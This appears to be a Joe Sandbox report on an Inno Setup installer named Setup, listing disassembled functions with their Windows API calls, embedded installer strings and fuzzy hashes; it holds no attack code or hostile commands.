Instruction Fuzzy Hash: 48F054B575070036EA10B6B69C47F5B168C9F54745F10483BB904EF2C3D97CD804962D

Function 0046F6E8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000), ref: 0046F739

Strings

Setting NTFS compression on file: %s, xrefs: 0046F707
Failed to set NTFS compression state (%d)., xrefs: 0046F74A
Unsetting NTFS compression on file: %s, xrefs: 0046F71F

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
API String ID: 1452528299-3038984924
Opcode ID: 798f2bfec3b31980496cba89dc97de6020f364a3bab81b29405c873f94f60b1d
Instruction ID: f59cf1e2ce1af00abf56b5bc0a41f2d9024385d3f2bbc815d9fc5944cd6688d7
Opcode Fuzzy Hash: 798f2bfec3b31980496cba89dc97de6020f364a3bab81b29405c873f94f60b1d
Instruction Fuzzy Hash: 77014430E082485ACF14DBE9B0512DDBBA4AF09355F4485FB7498D7282EA79090C97AA

Function 0047B994 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0047B9B5
GetLastError.KERNEL32 ref: 0047B9BF
GetTickCount.KERNEL32 ref: 0047B9C9
Sleep.KERNEL32(00000032), ref: 0047B9D9

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ErrorLast$CountSleepTick
String ID:
API String ID: 2227064392-0
Opcode ID: 39f5134338d7b7f4d0f584cfd972772526be6bfa89cabe034fcc1c0ac51aecd7
Instruction ID: f3e139474b33760e13a41918489e3ce7d48b14196341e5dbc503218970ea5f8b
Opcode Fuzzy Hash: 39f5134338d7b7f4d0f584cfd972772526be6bfa89cabe034fcc1c0ac51aecd7
Instruction Fuzzy Hash: 61E0E5F3309504458A2035BF2C837EF4688CA853A4B14553FF398D6282C5184C0545AE

Function 00476E20 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB,?,?,?,?,?,0049739E,00000000), ref: 00476E29
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB,?,?,?,?,?,0049739E), ref: 00476E2F
GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB), ref: 00476E51
CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB), ref: 00476E62

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: ea683f1176faa7b04f439609cbfa50fed3b377867b50ebe6ba59b47d1b4e9660
Instruction ID: 2b0e864392e04d63d4be4d22317bf8a61354631aa83d71046a7a405fca67f8c6
Opcode Fuzzy Hash: ea683f1176faa7b04f439609cbfa50fed3b377867b50ebe6ba59b47d1b4e9660
Instruction Fuzzy Hash: 5DF0A0A02407006BDA00EAB5CC82E9B73DCEB44714F04883A7E98C72C2D638DC08AB36

Function 00424250 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON

Download Yara Rule

APIs

GetLastActivePopup.USER32(0001041A), ref: 0042425C
IsWindowVisible.USER32(0001041A), ref: 0042426D
IsWindowEnabled.USER32(0001041A), ref: 00424277
SetForegroundWindow.USER32(0001041A), ref: 00424281

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$ActiveEnabledForegroundLastPopupVisible
String ID:
API String ID: 2280970139-0
Opcode ID: 82c5499aa3392c3e403b9f4de3da674b7760f040ec75a9184635b640fb16ef5d
Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
Opcode Fuzzy Hash: 82c5499aa3392c3e403b9f4de3da674b7760f040ec75a9184635b640fb16ef5d
Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC

Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

GlobalHandle.KERNEL32 ref: 00406287
GlobalUnlock.KERNEL32(00000000), ref: 0040628E
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
GlobalLock.KERNEL32(00000000), ref: 00406299

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Global$AllocHandleLockUnlock
String ID:
API String ID: 2167344118-0
Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D

Function 0046A11C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 262windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A32D
EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A333

Strings

CurPageChanged, xrefs: 0046A4D1

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Menu$EnableItemSystem
String ID: CurPageChanged
API String ID: 3692539535-2490978513
Opcode ID: 9433ae3e8c0d8cef7e1db9c76da1d64c1d3fe783aa42d9efde8d789ed8796f27
Instruction ID: 09a3f119f95f3e8b80b2758de21f208edffb37633c658fb2599a7cba3a6cac5e
Opcode Fuzzy Hash: 9433ae3e8c0d8cef7e1db9c76da1d64c1d3fe783aa42d9efde8d789ed8796f27
Instruction Fuzzy Hash: FBB13734644504DFC711DB99CA89AA973F5EF49304F2540F6F808AB322DB39AE51DF4A

Function 00478FF8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A869,?,00000000,00000000,00000001,00000000,00479295,?,00000000), ref: 00479259

Strings

Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 004790CD
Failed to parse "reg" constant, xrefs: 00479260

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Close
String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
API String ID: 3535843008-1938159461
Opcode ID: dd782897e1d4fbb33bfacf608e3381bb7fd7ee7b827dd76e856774fbc94dfdf2
Instruction ID: 835d74a0d62e725ebcdd17b5ae281fba2600a31c0460f99f6913a21494258781
Opcode Fuzzy Hash: dd782897e1d4fbb33bfacf608e3381bb7fd7ee7b827dd76e856774fbc94dfdf2
Instruction Fuzzy Hash: 54814374E04148AFCB10EF95D481ADEBBF9AF49314F50C1AAE814B7392D7389E05CB99

Function 0045BA84 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 0044FF9C: SetEndOfFile.KERNEL32(?,?,0045BB62,00000000,0045BCED,?,00000000,00000002,00000002), ref: 0044FFA3

FlushFileBuffers.KERNEL32(?), ref: 0045BCB9

Strings

NumRecs range exceeded, xrefs: 0045BBB6
EndOffset range exceeded, xrefs: 0045BBED

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$BuffersFlush
String ID: EndOffset range exceeded$NumRecs range exceeded
API String ID: 3593489403-659731555
Opcode ID: b36d6e2fb84a8d05e312cb8cf9ada1f63a6fee7fcbfcb1eb99cb5ec3a80f20e1
Instruction ID: 6d3af99510feac489041cfa654adec88581dc8f1b33a8ec1f5b56db9886abadc
Opcode Fuzzy Hash: b36d6e2fb84a8d05e312cb8cf9ada1f63a6fee7fcbfcb1eb99cb5ec3a80f20e1
Instruction Fuzzy Hash: 3F61B834A002988FDB25DF15C891AD9B3B5EF49305F0084EAED899B752D7B4AEC8CF54

Function 00481B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00481CA6,?,00000000,00481CE7,?,?,00000001,?,00000000,00000000,00000000,?,0046B0C9), ref: 00481B55
SetActiveWindow.USER32(0001041A,00000000,00481CA6,?,00000000,00481CE7,?,?,00000001,?,00000000,00000000,00000000,?,0046B0C9), ref: 00481B67

Strings

Will not restart Windows automatically., xrefs: 00481C86

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$ActiveForeground
String ID: Will not restart Windows automatically.
API String ID: 307657957-4169339592
Opcode ID: 340b31c50f7ea1cca09d8bb089bde520bea5fae951facb36814384a506b2de65
Instruction ID: 3c2f546218ed638d6c0bffff214a58deef3f88b70f64df96d283108febfe91f1
Opcode Fuzzy Hash: 340b31c50f7ea1cca09d8bb089bde520bea5fae951facb36814384a506b2de65
Instruction Fuzzy Hash: AC410430244240AED721FB65ED05B6E7BACE716744F144C77E880573B2E77C6806AB5E

Function 00424950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00424975
WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49

Strings

/sI, xrefs: 00424A02, 00424A0C, 00424A5B

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CursorMessageWait
String ID: /sI
API String ID: 4021538199-3342994382
Opcode ID: e464ca90ab4d86f7347922e1520434fa5b19a78b7732402e8499ce80aff62917
Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
Opcode Fuzzy Hash: e464ca90ab4d86f7347922e1520434fa5b19a78b7732402e8499ce80aff62917
Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D

Function 00477AB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,00477B9A,?,?,00000001,00000000,00000000,00477BB5), ref: 00477B83

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00477B0E
%s\%s_is1, xrefs: 00477B2C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1598650737
Opcode ID: 9aa391431cdfd7c8ac9132b1f690292c5f0e7387c8ef9685e430b8421bd0674f
Instruction ID: 45934157c02c0c496e244a65e612b419ef8ac41f5fcdc24e779c94ba4387b6af
Opcode Fuzzy Hash: 9aa391431cdfd7c8ac9132b1f690292c5f0e7387c8ef9685e430b8421bd0674f
Instruction Fuzzy Hash: 83215574B04604AFDB01DFA9CC51ADEBBE8EB49704F90847AE804E7391D7786E01CB69

Function 0046BD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON

Download Yara Rule

Strings

Failed to proceed to next wizard page; showing wizard., xrefs: 0046BEB0
Failed to proceed to next wizard page; aborting., xrefs: 0046BE9C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
API String ID: 0-1974262853
Opcode ID: 5dc44d02648091a3d8a5c75f99e041105ecf733eeb8d95a73b78758489fad9c1
Instruction ID: 49aa560ffa09cfd52454d09d180e6a2672ed2ce8b76d71ce0c2e5ac3cdd5c4fd
Opcode Fuzzy Hash: 5dc44d02648091a3d8a5c75f99e041105ecf733eeb8d95a73b78758489fad9c1
Instruction Fuzzy Hash: 963192306082049FD711DB69D985BD977F5EB05314F5900BBF504DB3A2D7796E80CB89

Function 0044F998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA2D
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA5E

Strings

open, xrefs: 0044FA51

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ExecuteMessageSendShell
String ID: open
API String ID: 812272486-2758837156
Opcode ID: 19d38553df1093e21c3c422bb3cdf04df903a53ff10fe20460ad4336edb0aeee
Instruction ID: 6bca1b6fab24ab3242c773a662d76c02cb62ab3d7fac9f31e1195573cc844b5d
Opcode Fuzzy Hash: 19d38553df1093e21c3c422bb3cdf04df903a53ff10fe20460ad4336edb0aeee
Instruction Fuzzy Hash: FB212E71E00204AFEB00DF69C881A9EB7F8EB44704F60857AB405F7391D6789A468B58

Function 004547BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(0000003C), ref: 00454858
GetLastError.KERNEL32(0000003C,00000000,004548A1,?,?,00000001,00000001), ref: 00454869

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

Strings

<, xrefs: 00454812

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: DirectoryErrorExecuteLastShellSystem
String ID: <
API String ID: 893404051-4251816714
Opcode ID: 9d6df4e87d2cf889a96dca017f77d729ce28fee4ed6454ffc7bc386f0453b653
Instruction ID: 9c2ad5da6bcfda7e7c126e73bbb5a2ea45b70f831c3532c714208d446c35f548
Opcode Fuzzy Hash: 9d6df4e87d2cf889a96dca017f77d729ce28fee4ed6454ffc7bc386f0453b653
Instruction Fuzzy Hash: FF21A574A002499FDB00EF65C88269E7BECEF44359F50003AF844E7381D7789D49CB98

Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049A420), ref: 004025C7
RtlLeaveCriticalSection.KERNEL32(0049A420), ref: 00402630

Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420), ref: 004019E2
Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420), ref: 004019F5
Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401A82,?,?,0040222E,0049A460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420), ref: 00401A7C

Strings

), xrefs: 004025AE

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: )
API String ID: 2227675388-1084416617
Opcode ID: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
Opcode Fuzzy Hash: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD

Function 0049518E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(0001041A,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004951C9

Strings

/INITPROCWND=$%x , xrefs: 004951F4
@, xrefs: 00495194

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window
String ID: /INITPROCWND=$%x $@
API String ID: 2353593579-4169826103
Opcode ID: d1053a672179ff3583de3c7baa2822a5df7e43495b3a7d26068aec598c4a0bc3
Instruction ID: 9aa7367fdd5c7212477ef5f2c1fb1af8b7d2e13723dbac355fa9f8943d192997
Opcode Fuzzy Hash: d1053a672179ff3583de3c7baa2822a5df7e43495b3a7d26068aec598c4a0bc3
Instruction Fuzzy Hash: 2F11B731A086088FDB02DBA4EC52BAEBFE8EB49314F60447BE504E7291D77C99058B58

Function 00446C68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

SysFreeString.OLEAUT32(?), ref: 00446D1A

Strings

NIL Interface Exception, xrefs: 00446CBC
Unknown Method, xrefs: 00446CF3

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: String$AllocByteCharFreeMultiWide
String ID: NIL Interface Exception$Unknown Method
API String ID: 3952431833-1023667238
Opcode ID: c57f3d86235feb565d953f7b33e9ce0aeb0c4074c408860b6886a41cd5ab8bd7
Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
Opcode Fuzzy Hash: c57f3d86235feb565d953f7b33e9ce0aeb0c4074c408860b6886a41cd5ab8bd7
Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E

Function 00494A00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00494AC8,?,00494ABC,00000000,00494AA3), ref: 00494A6E
CloseHandle.KERNEL32(00494B08,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00494AC8,?,00494ABC,00000000), ref: 00494A85

Part of subcall function 00494958: GetLastError.KERNEL32(00000000,004949F0,?,?,?,?), ref: 0049497C

Strings

D, xrefs: 00494A48

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseCreateErrorHandleLastProcess
String ID: D
API String ID: 3798668922-2746444292
Opcode ID: 93ab1ee0da1d3553f59390325b0704cbffb6fa82602143dacb3a0d1ec44a23c1
Instruction ID: 80fb1cf359d0b2f5838fc37b3898d8fc4d4ed0433fb5d18bfd797e21ae142335
Opcode Fuzzy Hash: 93ab1ee0da1d3553f59390325b0704cbffb6fa82602143dacb3a0d1ec44a23c1
Instruction Fuzzy Hash: 9A015EB1644248AFDB00DBA1CC52E9FBBACEF88715F51003AB904E72D1D6785E05866C

Function 0042DC8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0

Strings

Inno Setup: No Icons, xrefs: 0042DC9E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
